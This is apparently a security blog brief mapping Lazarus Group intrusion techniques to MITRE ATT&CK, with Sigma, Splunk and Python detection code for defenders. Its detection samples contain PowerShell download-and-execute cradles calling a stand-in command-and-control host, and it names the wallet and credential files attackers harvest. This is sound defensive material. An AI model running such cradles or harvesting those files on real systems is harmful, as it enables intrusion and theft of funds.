Lazarus Group: MITRE ATT&CK Techniques and Detection Patterns
Published March 26, 2025 · 16 min read
Lazarus Group, tracked by MITRE as G0032, by CrowdStrike as Labyrinth Chollima, and by Microsoft as Diamond Sleet (formerly ZINC), is the umbrella name for cyber operations run by North Korea's Reconnaissance General Bureau (RGB); Mandiant's APT38 (MITRE G0082) is the financially motivated sub-group within it that carries out the bank and cryptocurrency heists. Since 2014 the group has stolen an estimated USD 3 billion in cryptocurrency (the UN Panel of Experts' figure for 2017-2023), breached SWIFT-connected banks, and delivered the 3CX desktop client supply-chain compromise that reached thousands of downstream organisations in March 2023. This brief maps their observed TTPs to MITRE ATT&CK Enterprise v15 with detection guidance you can drop into a Sigma rule pack or your EDR's query language.
CISA, FBI, and Treasury jointly track DPRK cyber activity under advisory AA20-239A and its follow-ons. Indian targets in this group's portfolio have included cryptocurrency exchanges, defence contractors, and a sustained campaign, running since 2017, of LinkedIn-mediated phishing against IT sector employees in Bengaluru, Pune, and Hyderabad. Treat the techniques below as present-tense threats, not history.
Initial access — T1566 / T1190 / T1195
Lazarus operators favour three initial-access vectors: spear-phishing with weaponised LinkedIn recruiter lures (T1566.002, Spearphishing Link); exploiting unpatched public-facing applications such as Log4Shell-vulnerable (CVE-2021-44228) VMware Horizon servers and exposed JBoss and Confluence instances (T1190, Exploit Public-Facing Application); and software supply-chain compromise via poisoned npm packages, PyPI typosquats, and trojanised signed installers (T1195.002, Compromise Software Supply Chain).
The 2023 3CX incident (CVE-2023-29059) chained two supply-chain compromises. A trojanised X_TRADER installer, still carrying a valid signature from the legitimate vendor Trading Technologies, compromised the personal computer of a 3CX employee; the attackers harvested credentials from it, moved into 3CX's corporate and build environments, and poisoned the Electron-based 3CX desktop client. Downstream customers received a signed, trusted update whose ffmpeg.dll had been modified to load a malicious d3dcompiler_47.dll. Mandiant attributed the campaign to UNC4736, a cluster it links to the Lazarus AppleJeus activity.
The 2024 Operation Dream Job iteration spread weaponised npm modules (web3-eth-handler, react-pinch, etherscan-helper) targeting cryptocurrency engineers. The packages contained an obfuscated post-install script that pulled a second stage from a repository on a public code-hosting service. Detection: alert in CI on any npm install of a package less than 30 days old, published by an account with no prior history, or carrying a preinstall, install or postinstall script.
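The CI check described above, written out as an added example (this is not code from the original post or from npm): it scores a package from its registry metadata document, the JSON that `GET https://registry.npmjs.org/<name>` returns, on the three signals the text names. The package names, maintainers, dates and the maintainer-history table below are constructed so the script runs offline.

```python
"""Added example, not code from the original post: a CI policy check over an
npm registry metadata document (the JSON that GET https://registry.npmjs.org/<name>
returns). Everything below runs offline on constructed documents; the package
names, maintainers, dates and maintainer history are invented."""
from datetime import datetime, timedelta, timezone

MAX_PACKAGE_AGE_DAYS = 30
LIFECYCLE_SCRIPTS = ("preinstall", "install", "postinstall")  # run automatically by `npm install`


def parse_registry_time(ts):
    """Registry timestamps are ISO 8601 with a trailing Z; return an aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def assess_npm_package(meta, maintainer_history, now):
    """Return policy findings (list of str) for one registry metadata document.

    meta               -- dict in the registry's package-document format
    maintainer_history -- {maintainer: count of other packages they have published};
                          constructed here, in CI you would fill it from a cached
                          registry search or an internal allowlist
    now                -- aware datetime treated as 'today' so results are deterministic
    """
    findings = []

    age = now - parse_registry_time(meta["time"]["created"])
    if age < timedelta(days=MAX_PACKAGE_AGE_DAYS):
        findings.append(f"package first published {age.days} days ago (< {MAX_PACKAGE_AGE_DAYS})")

    latest = meta["dist-tags"]["latest"]
    scripts = meta["versions"][latest].get("scripts", {})
    hooks = {name: scripts[name] for name in LIFECYCLE_SCRIPTS if name in scripts}
    if hooks:
        findings.append(f"install-time lifecycle script(s): {hooks}")

    for maintainer in meta.get("maintainers", []):
        if maintainer_history.get(maintainer["name"], 0) == 0:
            findings.append(f"maintainer {maintainer['name']!r} has no prior publishing history")

    return findings


def should_block(findings):
    """Block when a young or unknown-maintainer package also runs code at install time."""
    runs_code = any(f.startswith("install-time") for f in findings)
    low_reputation = any(f.startswith(("package first published", "maintainer")) for f in findings)
    return runs_code and low_reputation


# Constructed registry documents (not real packages).
NOW = datetime(2024, 12, 1, tzinfo=timezone.utc)

SUSPECT_META = {
    "name": "example-web3-helper",
    "dist-tags": {"latest": "1.0.2"},
    "time": {"created": "2024-11-20T09:12:00.000Z", "1.0.2": "2024-11-23T10:00:00.000Z"},
    "maintainers": [{"name": "fresh-publisher", "email": "fresh@example.invalid"}],
    "versions": {
        "1.0.2": {
            "name": "example-web3-helper",
            "version": "1.0.2",
            "scripts": {"postinstall": "node ./scripts/setup.js"},
        }
    },
}

BENIGN_META = {
    "name": "example-utils",
    "dist-tags": {"latest": "4.8.1"},
    "time": {"created": "2016-03-02T12:00:00.000Z", "4.8.1": "2024-06-01T08:00:00.000Z"},
    "maintainers": [{"name": "long-time-maintainer", "email": "lt@example.invalid"}],
    "versions": {"4.8.1": {"name": "example-utils", "version": "4.8.1", "scripts": {"test": "node test.js"}}},
}

MAINTAINER_HISTORY = {"fresh-publisher": 0, "long-time-maintainer": 27}  # constructed


if __name__ == "__main__":
    for meta in (SUSPECT_META, BENIGN_META):
        findings = assess_npm_package(meta, MAINTAINER_HISTORY, NOW)
        print(meta["name"], "BLOCK" if should_block(findings) else "allow", findings)
```

The block decision deliberately requires two signals: a fresh package with no install hook is common and harmless, while an install hook alone is how many legitimate native modules build, so neither should break CI on its own.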
Execution — T1059 / T1218
Operators commonly drop BLINDINGCAN, CageyChameleon, or LightlessCan via PowerShell (T1059.001) and Bash (T1059.004), and proxy execution through signed binaries such as regsvr32.exe (T1218.010) and rundll32.exe (T1218.011). On macOS targets they prefer osascript and AppleScript wrappers around in-memory Mach-O loaders. Lazarus is among the most prolific abusers of LOLBAS (Living Off The Land Binaries and Scripts).
```yaml
# Sigma — Lazarus PowerShell pattern (T1059.001)
title: Suspicious PowerShell IEX with base64 chunk
id: 8c7d1e2a-7b1c-4f9a-9e6d-f8a2b1c3d4e5
status: experimental
description: >
  Detects Lazarus-style PowerShell loaders combining IEX, base64 and a
  downloader cradle in a single ScriptBlock (Script Block Logging, Event ID 4104).
references:
  - https://attack.mitre.org/groups/G0032/
logsource:
  product: windows
  service: powershell
detection:
  selection:
    EventID: 4104
    ScriptBlockText|contains|all:
      - 'IEX'
      - 'Net.WebClient'
      - 'FromBase64String'
  filter_legitimate:
    ScriptBlockText|contains:
      - 'C:\Program Files\WindowsPowerShell\Modules'
  condition: selection and not filter_legitimate
fields:
  - ComputerName
  - User
  - ScriptBlockText
falsepositives:
  - Internal red team tooling using IEX cradles
level: high
tags:
  - attack.execution
  - attack.t1059.001
  - attack.g0032
```

Persistence — T1547 / T1543
On Windows, Lazarus persists via HKCU\Software\Microsoft\Windows\CurrentVersion\Run entries (T1547.001), scheduled tasks (T1053.005), DLL search-order hijacking against signed binaries (T1574.001), and COM hijacking on rarely loaded CLSIDs (T1546.015). On macOS, LaunchDaemons under /Library/LaunchDaemons/ (T1543.004) are the preferred persistence mechanism, documented in the AppleJeus macOS samples (CISA AA21-048A) and again in the JumpCloud breach of June 2023.
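The macOS check, as an added example (not code from the original post or from osquery): it applies the same idea as the Splunk query that follows, a job under /Library/LaunchDaemons/ whose program is not Apple-, Jamf- or Microsoft-signed, directly to plist content, so it runs over a plist export with no osquery in the loop. The plists, labels and paths are constructed, and the signer lookup is a stand-in for the Authority line of `codesign -dv --verbose=2`.

```python
"""Added example, not code from the original post or from osquery: triage of
LaunchDaemon plists for persistence written outside the MDM channel. The
plists, labels, paths and the signer lookup are constructed; the lookup stands
in for the Authority line of `codesign -dv --verbose=2`."""
import plistlib
import re

# Label namespaces and program locations your fleet legitimately uses (assumption:
# Macs enrolled in Jamf with the Microsoft Defender agent installed).
TRUSTED_LABEL_RE = re.compile(r"^(com\.apple\.|com\.jamf\.|com\.microsoft\.)")
TRUSTED_PROGRAM_DIRS = (
    "/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/",
    "/Library/Application Support/JAMF/",
    "/Library/Application Support/Microsoft/",
)
TRUSTED_SIGNER_RE = re.compile(r"(Apple|Jamf|Microsoft)", re.IGNORECASE)


def program_of(plist):
    """Binary a launchd job executes: Program wins, otherwise ProgramArguments[0]."""
    program = plist.get("Program")
    if not program:
        args = plist.get("ProgramArguments") or []
        program = args[0] if args else None
    return program


def triage_launch_daemon(path, plist_bytes, signer_of):
    """Reasons (list of str) a LaunchDaemon plist looks like unmanaged persistence.

    signer_of(program_path) -> signing authority string, or None when unsigned.
    Plists outside /Library/LaunchDaemons/ are out of scope and return [].
    """
    if not path.startswith("/Library/LaunchDaemons/"):
        return []
    plist = plistlib.loads(plist_bytes)
    reasons = []
    label = plist.get("Label", "")
    if not TRUSTED_LABEL_RE.match(label):
        reasons.append(f"label {label!r} outside managed namespaces")
    program = program_of(plist)
    if program is None:
        reasons.append("no Program or ProgramArguments")
        return reasons
    if not program.startswith(TRUSTED_PROGRAM_DIRS):
        reasons.append(f"program {program!r} outside trusted directories")
    authority = signer_of(program)
    if authority is None or not TRUSTED_SIGNER_RE.search(authority):
        reasons.append(f"program signer {authority!r} is not Apple/Jamf/Microsoft")
    # An Apple-looking label does not save the attacker: the program and signer
    # checks still fire. Once suspicious, record how persistent the job is.
    if reasons and plist.get("RunAtLoad") and (plist.get("KeepAlive") or plist.get("StartInterval")):
        reasons.append("RunAtLoad with KeepAlive/StartInterval: restarts itself")
    return reasons


# Constructed plists; the suspect label and paths are invented.
SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.apple.softwareupdate.helper",      # Apple-looking label, not Apple's
    "ProgramArguments": ["/Users/Shared/.update/helper", "--daemon"],
    "RunAtLoad": True,
    "KeepAlive": True,
})
JAMF_PROGRAM = "/Library/Application Support/JAMF/Jamf.app/Contents/MacOS/JamfDaemon.app/Contents/MacOS/JamfDaemon"
MANAGED_PLIST = plistlib.dumps({
    "Label": "com.jamf.management.daemon",
    "Program": JAMF_PROGRAM,
    "RunAtLoad": True,
    "KeepAlive": True,
})


def constructed_signer(program):
    """Stand-in for codesign output; only the managed daemon is 'signed' here."""
    return {JAMF_PROGRAM: "Developer ID Application: JAMF Software (TEAMID)"}.get(program)


if __name__ == "__main__":
    for path, data in (
        ("/Library/LaunchDaemons/com.apple.softwareupdate.helper.plist", SUSPECT_PLIST),
        ("/Library/LaunchDaemons/com.jamf.management.daemon.plist", MANAGED_PLIST),
    ):
        print(path, triage_launch_daemon(path, data, constructed_signer))
```

The label allowlist is the weakest of the three checks, which is why the example keeps firing on program location and signer even when the label looks like Apple's; in production feed `signer_of` from a scheduled osquery `signature` table query or from `codesign` run against the exported paths.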
```spl
# Splunk SPL — LaunchDaemon written outside MDM channels.
# Assumes a scheduled osquery query "launchd_daemons" that joins the launchd,
# signature and hash tables on the daemon's program path (osquery's launchd
# table itself has no uid, signer or hash columns).
index=osquery sourcetype="osquery:results" name="pack_persistence_launchd_daemons"
| rename columns.* AS *
| where match(path, "^/Library/LaunchDaemons/")
  AND (isnull(authority) OR NOT match(authority, "(Apple|Jamf|Microsoft)"))
| stats count BY host, path, program, authority, sha256
```

Defense evasion — T1027 / T1140 / T1562
Payloads are typically VMProtect- or Themida-packed, or wrapped in custom XOR packers (T1027.002, Software Packing), unpacked through multi-stage RC4-plus-XOR loaders (T1140, Deobfuscate/Decode Files or Information), and accompanied by EDR-killer components that bring their own vulnerable driver (BYOVD) to tamper with security tooling (T1562.001). The best-documented case is CVE-2021-21551 in Dell's dbutil_2_3.sys, which Lazarus was the first actor observed exploiting in the wild, used to strip the kernel callbacks that Microsoft Defender and other EDR sensors depend on.
FudModule, the rootkit ESET first described in 2022 and Avast analysed in updated form in 2024, takes BYOVD a step further: the 2024 variant exploited CVE-2024-21338, a zero-day in appid.sys (Windows' own AppLocker driver, Microsoft-signed and already loaded on every host), to gain arbitrary kernel read/write and blind EDR sensors without dropping a third-party driver at all. Detection therefore needs kernel telemetry: Microsoft's recommended driver block rules are the baseline for the third-party-driver case, Sysmon Event ID 6 alerts on signed-but-vulnerable driver loads catch the dbutil pattern, and the appid.sys path shows up only in process behaviour, since no new driver is ever loaded.
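The Sysmon Event ID 6 triage that this section and the "EDR query" bullet in the detection priorities both call for, as an added example (not code from the original post or from Sysmon): it uses Sysmon's own DriverLoad field names on events assumed already parsed into dicts. The block-list sets are placeholders for Microsoft's recommended driver block rules, and every hash and non-inbox path is constructed. As the text says, the appid.sys abuse never loads a new driver, so no DriverLoad rule, this one included, will see it.

```python
"""Added example, not code from the original post: triage of Sysmon Event ID 6
(DriverLoad) records for the BYOVD pattern. BLOCKED_* are placeholders for the
Microsoft recommended driver block rules (load the real policy's file names and
hashes); every hash and non-inbox path below is constructed, not an indicator."""

# Placeholders for the vulnerable-driver block list (assumption: populated from
# the Microsoft recommended driver block rules policy in production).
BLOCKED_FILENAMES = {"dbutil_2_3.sys"}          # CVE-2021-21551, named in the text
BLOCKED_SHA256 = {"0" * 64}                     # constructed placeholder hash
SYSTEM_DRIVER_DIRS = (
    "c:\\windows\\system32\\drivers\\",
    "c:\\windows\\system32\\driverstore\\",
)


def parse_hashes(field):
    """Sysmon's Hashes field is 'SHA256=...,IMPHASH=...'; return {algo: lowercase hex}."""
    hashes = {}
    for part in field.split(","):
        algo, _, value = part.partition("=")
        if value:
            hashes[algo.strip().upper()] = value.strip().lower()
    return hashes


def triage_driver_load(event):
    """Return BYOVD indicators (list of str) for one parsed Sysmon EID 6 event."""
    image = event.get("ImageLoaded", "")
    image_lower = image.lower()
    file_name = image_lower.rsplit("\\", 1)[-1]
    hashes = parse_hashes(event.get("Hashes", ""))
    signed = event.get("Signed", "").lower() == "true"
    status = event.get("SignatureStatus", "")
    signer = event.get("Signature", "")
    in_system_dirs = image_lower.startswith(SYSTEM_DRIVER_DIRS)

    indicators = []
    if file_name in BLOCKED_FILENAMES or hashes.get("SHA256") in BLOCKED_SHA256:
        indicators.append(f"{file_name} is on the vulnerable-driver block list")
    if not (signed and status.lower() == "valid"):
        indicators.append(f"signature not valid (Signed={signed}, SignatureStatus={status!r})")
    if not in_system_dirs:
        who = "Microsoft-signed " if "microsoft" in signer.lower() else ""
        indicators.append(f"{who}driver loaded from non-system path {image!r}")
    return indicators


def triage_all(events):
    """Map ImageLoaded -> indicators, dropping clean loads."""
    hits = {}
    for event in events:
        indicators = triage_driver_load(event)
        if indicators:
            hits[event["ImageLoaded"]] = indicators
    return hits


SAMPLE_EVENTS = [
    {   # constructed: the Dell driver dropped into a user-writable directory. It is
        # validly signed, which is exactly why BYOVD works and why the list matters.
        "ImageLoaded": "C:\\Users\\Public\\Libraries\\dbutil_2_3.sys",
        "Hashes": "SHA256=" + "a1" * 32 + ",IMPHASH=" + "b2" * 16,
        "Signed": "true", "Signature": "Dell Inc.", "SignatureStatus": "Valid",
    },
    {   # constructed: an unsigned driver placed among the inbox drivers
        "ImageLoaded": "C:\\Windows\\System32\\drivers\\updsvc.sys",
        "Hashes": "SHA256=" + "c3" * 32,
        "Signed": "false", "Signature": "", "SignatureStatus": "Unavailable",
    },
    {   # constructed: a genuine inbox driver load, should stay quiet
        "ImageLoaded": "C:\\Windows\\System32\\drivers\\tcpip.sys",
        "Hashes": "SHA256=" + "d4" * 32,
        "Signed": "true", "Signature": "Microsoft Windows", "SignatureStatus": "Valid",
    },
]


if __name__ == "__main__":
    for image, indicators in triage_all(SAMPLE_EVENTS).items():
        print(image, indicators)
```

The first sample is the instructive one: signature checks pass, so only the block-list match and the load path give it away. Keep the list current, because a vulnerable driver that is not on it and is copied into the drivers directory passes all three checks here.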
Credential access — T1003 / T1555 / T1539
Credential access in Lazarus intrusions means lsass.exe memory dumping (T1003.001) via custom Mimikatz forks, browser credential theft (T1555.003), and session-cookie theft from Chrome/Edge profiles (T1539). For crypto-focused campaigns, operators harvest browser extensions and desktop wallet files (~/Library/Application Support/Exodus/, %APPDATA%\Electrum\wallets, and MetaMask vault blobs from the Chrome extension's LevelDB storage). The post-September-2023 CryptoCore samples include a Slack desktop scraper for wallet seed phrases pasted in DM windows.
Lateral movement — T1021 / T1570
Lateral movement uses SMB admin shares with stolen NTLM hashes (T1021.002), RDP with harvested credentials (T1021.001), and lateral tool transfer over WMI / SMB (T1570). The March 2022 Ronin Bridge intrusion (USD 625 million stolen from Sky Mavis; attributed to Lazarus by the US Treasury, which added the theft's ETH address to the OFAC SDN list in April 2022) began with a fake job offer: an Axie Infinity engineer opened a malicious PDF, the operators pivoted from that laptop into Sky Mavis infrastructure and took the keys of four of its validators, then used a still-active Axie DAO allowlist to obtain a fifth signature and meet the bridge's 5-of-9 threshold.
Command & control — T1071 / T1090
HTTPS to compromised WordPress sites (T1071.001) and multi-hop proxying through Tor (T1090.003) are the staples. Lazarus RAT beacons typically add jitter to their sleep interval, rotate C2 infrastructure every 24-72 hours, and sit behind Cloudflare-fronted domains, with domain-fronting fallbacks where the CDN still allows it. Detection: alert on JA3/JA3S fingerprints inconsistent with the claimed User-Agent, and on TLS SNI / Host-header mismatches at the egress proxy.
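The two egress checks above, plus the "first seen in 7 days" rule from the detection priorities, run over constructed proxy records as an added example (not code from the original post). The JA3 values and the User-Agent-to-JA3 baseline are placeholders: a real baseline comes from your own egress history, not from this table, and every host name and hash below is constructed.

```python
"""Added example, not code from the original post: egress TLS/proxy triage for
SNI/Host mismatch, JA3 fingerprints inconsistent with the User-Agent, and
first-seen destinations. Baseline, domains and fingerprints are constructed."""
from datetime import date, timedelta

FIRST_SEEN_WINDOW_DAYS = 7

# Constructed baseline: JA3 hashes seen with each User-Agent family in normal
# traffic. Build the real one from 30 days of your own egress logs.
UA_JA3_BASELINE = {
    "chrome": {"ja3-chrome-constructed-1", "ja3-chrome-constructed-2"},
    "edge": {"ja3-chrome-constructed-1"},
    "python-requests": {"ja3-requests-constructed"},
}


def ua_family(user_agent):
    """Coarse UA family; order matters because Edge UAs also contain 'Chrome/'."""
    ua = user_agent.lower()
    if "edg/" in ua:
        return "edge"
    if "chrome/" in ua:
        return "chrome"
    if ua.startswith("python-requests"):
        return "python-requests"
    return "unknown"


def registrable(host):
    """Last two labels as a crude registrable domain (assumption: use a public
    suffix list library such as tldextract in production)."""
    parts = host.lower().rstrip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else host.lower()


def triage_egress(record, first_seen, today):
    """Alerts (list of str) for one record with sni, host_header, ja3, user_agent.

    first_seen -- {registrable_domain: date first observed in egress telemetry}
    """
    alerts = []
    sni = record.get("sni", "").lower()
    host = record.get("host_header", "").lower()
    if sni and host and sni != host:
        alerts.append(f"SNI/Host mismatch: sni={sni} host={host}")

    family = ua_family(record.get("user_agent", ""))
    baseline = UA_JA3_BASELINE.get(family)          # unknown UA family: cannot judge
    if baseline is not None and record.get("ja3") not in baseline:
        alerts.append(f"JA3 {record.get('ja3')} not in baseline for UA family {family}")

    # Check both names: in a fronting setup the Host header carries the real target.
    for domain in sorted({registrable(h) for h in (sni, host) if h}):
        seen = first_seen.get(domain)
        if seen is None:
            alerts.append(f"destination {domain} never seen before")
        elif today - seen < timedelta(days=FIRST_SEEN_WINDOW_DAYS):
            alerts.append(f"destination {domain} first seen {(today - seen).days}d ago")
    return alerts


# Constructed telemetry.
TODAY = date(2025, 3, 26)
FIRST_SEEN = {"cdn-provider.example": date(2024, 1, 10), "wp-blog.example": date(2025, 3, 24)}
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36")
SAMPLE_RECORDS = [
    {   # fronting through a CDN name to a 2-day-old WordPress host, with a
        # scripting-library TLS fingerprint behind a browser User-Agent
        "sni": "assets.cdn-provider.example", "host_header": "api.wp-blog.example",
        "ja3": "ja3-requests-constructed", "user_agent": CHROME_UA,
    },
    {   # ordinary browser traffic to a long-known CDN
        "sni": "www.cdn-provider.example", "host_header": "www.cdn-provider.example",
        "ja3": "ja3-chrome-constructed-1", "user_agent": CHROME_UA,
    },
    {   # honest UA and fingerprint, but a destination no one here has used before
        "sni": "api.new-c2.example", "host_header": "api.new-c2.example",
        "ja3": "ja3-requests-constructed", "user_agent": "python-requests/2.31",
    },
]


if __name__ == "__main__":
    for record in SAMPLE_RECORDS:
        print(record["sni"], triage_egress(record, FIRST_SEEN, TODAY))
```

The first record trips all three rules at once, which is the profile worth paging on; the third trips only the first-seen rule and is a hunt lead, not an alert, unless the source is a developer workstation or a wallet host.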
Impact — T1657 / T1486
Lazarus is unusual among state-directed APTs in pursuing direct financial gain (T1657, Financial Theft). Notable operations documented in DOJ indictments and CISA/FBI advisories: the Bangladesh Bank SWIFT heist (USD 81M, 2016), WannaCry (T1486, Data Encrypted for Impact, May 2017), KuCoin (USD 281M, 2020), Ronin Bridge (USD 625M, March 2022), Atomic Wallet (about USD 100M, June 2023), Stake.com (USD 41M, September 2023), and the 2024 DMM Bitcoin theft (USD 308M, attributed by the FBI, DoD DC3 and Japan's NPA in December 2024).
| Year | Target | Loss (USD) | Authoritative reference |
|---|---|---|---|
| 2016 | Bangladesh Bank (SWIFT) | 81M | Federal Reserve Bank of New York statements; DOJ complaint against Park Jin Hyok (2018) |
| 2017 | WannaCry (global) | ~4B estimated damage | US-CERT TA17-132A |
| 2022 | Ronin Bridge / Sky Mavis | 625M | OFAC SDN designation, 14 April 2022 |
| 2023 | Atomic Wallet | ~100M | Elliptic analysis; FBI statement, 22 August 2023 |
| 2024 | DMM Bitcoin (Japan) | 308M | FBI / DC3 / NPA joint statement, 23 December 2024 |
Detection priorities for blue teams
- Alert on PowerShell -EncodedCommand arguments whose decoded payload exceeds 500 bytes (the command line is in Sysmon Event ID 1 / Security 4688; the decoded script appears in 4104), correlated with a parent process outside {explorer, mmc, powershell_ise}.
- Hunt for vulnerable or unsigned drivers loaded after a legitimate signed parent (BYOVD pattern): Sysmon Event ID 6 driver loads enriched with System Event 7045 service installs.
- Monitor LaunchDaemons created outside MDM channels on managed Macs. Osquery + Jamf telemetry.
- Block known-bad domains and infrastructure from threat-intel feeds (Lazarus rotates rapidly, so consume STIX/TAXII feeds rather than static lists). MISP + Cortex XSOAR is a working stack.
- Tag npm and PyPI installs of packages younger than 30 days, or from accounts with no publishing history, as suspicious in CI; require a maintainer reputation score above a threshold you set.
- EDR query: any process loading a Microsoft-signed driver from a non-system path, or any driver matching the recommended driver block list hashes. Know the limit: the appid.sys abuse described above loads nothing new, so it needs behavioural telemetry rather than a driver-load event.
- Egress: alert on outbound HTTPS to first-seen-in-7-days domains from any internal subnet, especially developer workstations.
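The two PowerShell bullets above, written out as an added example that runs over constructed Windows event records (this is not code from the original post or from Sigma). Check 1 applies the logic of the Sigma rule in the Execution section to Event ID 4104 ScriptBlockText and closes a gap in it: the rule's literal 'IEX' misses the spelled-out Invoke-Expression alias. Check 2 decodes -EncodedCommand, in any of the abbreviations powershell.exe accepts, from process-creation records with Sysmon EID 1 field names (assumed already parsed) and applies the 500-byte and parent-process rule. All hosts, paths and commands are constructed.

```python
"""Added example, not code from the original post: the two PowerShell checks from
the detection priorities over constructed 4104 and process-creation events."""
import base64
import re

CRADLE_TERMS = ("net.webclient", "frombase64string")
IEX_RE = re.compile(r"\b(?:iex|invoke-expression)\b", re.IGNORECASE)
LEGIT_MODULE_PATH = "c:\\program files\\windowspowershell\\modules"
ALLOWED_PARENTS = {"explorer.exe", "mmc.exe", "powershell_ise.exe"}
ENCODED_PAYLOAD_LIMIT = 500  # bytes of decoded UTF-16LE script


def check_scriptblock(event):
    """Sigma-equivalent check on one 4104 event; returns 'iex-cradle' or None."""
    text = event.get("ScriptBlockText", "")
    lowered = text.lower()
    if LEGIT_MODULE_PATH in lowered:          # the rule's filter_legitimate
        return None
    if IEX_RE.search(text) and all(term in lowered for term in CRADLE_TERMS):
        return "iex-cradle"
    return None


def extract_encoded_command(command_line):
    """Base64 argument of -EncodedCommand, accepting -e, -ec, -en, -enc ... -EncodedCommand."""
    for match in re.finditer(r"(?:^|\s)[-/](\w+)\s+([A-Za-z0-9+/=]{8,})", command_line):
        flag = match.group(1).lower()
        if flag in ("e", "ec") or (len(flag) >= 2 and "encodedcommand".startswith(flag)):
            return match.group(2)
    return None


def encode_command(script):
    """What the attacker does: base64 of the UTF-16LE script (used to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64):
    """Return (decoded_byte_length, script_text); tolerates stripped '=' padding."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return len(raw), raw.decode("utf-16-le", errors="replace")


def check_process_creation(event):
    """EncodedCommand rule on one process-creation event; returns a reason or None."""
    b64 = extract_encoded_command(event.get("CommandLine", ""))
    if b64 is None:
        return None
    size, _script = decode_encoded_command(b64)
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if size > ENCODED_PAYLOAD_LIMIT and parent not in ALLOWED_PARENTS:
        return f"encodedcommand {size}B from {parent}"
    return None


def build_samples():
    """Constructed events: two cradles (one spelled out), one filtered module load,
    one long encoded command spawned by wscript.exe, one by explorer.exe."""
    long_script = ("$c=New-Object Net.WebClient;" + "$a=1;" * 80
                   + "IEX $c.DownloadString('http://c2.example.invalid/s')")
    ps = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    return {
        "scriptblocks": [
            {"EventID": 4104, "ScriptBlockText":
             "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a'); "
             "[Convert]::FromBase64String($x)"},
            {"EventID": 4104, "ScriptBlockText":
             "Invoke-Expression ((New-Object Net.WebClient).DownloadString('http://c2.example.invalid/b')); "
             "$d=[System.Convert]::FromBase64String($p)"},
            {"EventID": 4104, "ScriptBlockText":
             "Import-Module 'C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadLine'; "
             "IEX $x; $w=New-Object Net.WebClient; [Convert]::FromBase64String($y)"},
        ],
        "processes": [
            {"EventID": 1, "Image": ps, "ParentImage": "C:\\Windows\\System32\\wscript.exe",
             "CommandLine": f"powershell.exe -nop -w hidden -enc {encode_command(long_script)}"},
            {"EventID": 1, "Image": ps, "ParentImage": "C:\\Windows\\explorer.exe",
             "CommandLine": f"powershell.exe -e {encode_command(long_script)}"},
        ],
    }


def run_all(samples):
    """Alerts across both event types, in order."""
    alerts = []
    for event in samples["scriptblocks"]:
        hit = check_scriptblock(event)
        if hit:
            alerts.append(hit)
    for event in samples["processes"]:
        hit = check_process_creation(event)
        if hit:
            alerts.append(hit)
    return alerts


if __name__ == "__main__":
    for alert in run_all(build_samples()):
        print(alert)
```

Two things the samples are built to show: the third script block is suppressed by the module-path filter even though it contains all three cradle terms, which is the false-negative cost of that filter, and the second process event is identical in payload to the first but is dropped because explorer.exe is an allowed parent, so the parent allowlist needs the same scrutiny as the rule itself.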
Adversary emulation playbook
For purple-team exercises, the open Adversary Emulation Library from MITRE Engenuity's Center for Threat-Informed Defense ships scenario plans for FIN6, OilRig, APT29, and others; Lazarus emulation is community-built and should focus on three flags: (1) supply-chain delivery via a signed but malicious npm package, (2) BYOVD-driven EDR blinding, and (3) lateral movement to a wallet or signing system with exfiltration over DNS or covert HTTPS. Run a red team engagement simulating these TTPs against your own controls: the gap between "we have EDR" and "we detect T1218.011 (rundll32 proxy execution) in 12 minutes" is where breaches happen.
What this means for your team
If you handle cryptocurrency, are a Tier-1 Indian or SE-Asian bank, employ engineers who get LinkedIn approaches from foreign "recruiters", or sit downstream of a build vendor, Lazarus is in your threat model whether you like it or not. Three concrete actions for the next 30 days: (1) ship the Sigma pack above into your SIEM and tune false positives down, (2) put npm / PyPI install policies in CI that block packages younger than 30 days from accounts with no publishing history, and (3) commission a Lazarus-profile adversary emulation against the validator, wallet, or signing-key environment that holds your real value. Detection latency is the only metric that matters when the attacker's objective is moving funds in a single block.
Further reading
- MITRE ATT&CK for Financial Services — sector-level technique mapping that includes APT38 / Lazarus.
- Supply Chain Attacks 2026 — the npm / installer vector Lazarus leans on.
- Tabletop Exercise Templates — rehearse a Lazarus-style funds-theft scenario.
- Red Team Service — commission a Lazarus-profile adversary emulation.